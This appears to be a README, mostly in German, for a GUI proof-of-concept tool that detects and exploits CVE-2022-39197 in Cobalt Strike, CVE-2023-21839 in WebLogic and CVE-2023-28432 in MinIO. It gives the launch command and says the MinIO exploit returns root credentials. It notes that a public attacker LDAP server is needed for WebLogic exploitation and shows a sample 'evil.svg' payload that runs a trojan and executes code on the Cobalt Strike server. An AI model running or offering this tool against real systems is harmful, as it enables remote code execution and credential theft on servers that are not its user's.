
Ein Testwerkzeug für CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432
A testing tool for CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432
Grafisches Tool zur Erkennung und Ausnutzung dieser drei Schwachstellen
java -jar Gui-poc-test.jar
Verwendung: Es gibt zwei Schaltflächen: Erkennung und Ausnutzung. Die unterschiedliche Verwendung je nach Schwachstelle wird in der Tool-Oberfläche angezeigt.
Ziel eingeben, kein Port erforderlich, Standard 9000, änderbar, siehe Quellcode GuiDemo.java:Zeile 144
Gibt MINIO_ROOT_USER und MINIO_ROOT_PASSWORD usw. zurück.
Ziel-IP, Port und LDAP-Serveradresse eingeben
Erkennung:
Hinweis: Für die Ausnutzung muss ein eigener LDAP-Server (öffentlich) eingerichtet werden.
Beispiel-Payload:
beacon.exe http://127.0.0.1:4444/evil.svg
Ergebnis: Der Trojaner läuft unter Windows, der CS-Client auf dem Mac verbindet sich.
Gleichzeitig führt der CS-Server den Inhalt des JAR-Pakets aus und öffnet den Taschenrechner.
Windows protokolliert die CS-Zugriffsadresse.
Prinzip: https://github.com/gobysec/Weblogic/blob/main/WebLogic_CVE-2023-21931_zh_CN.md
https://github.com/4ra1n/CVE-2023-21839
https://github.com/DXask88MA/Weblogic-CVE-2023-21839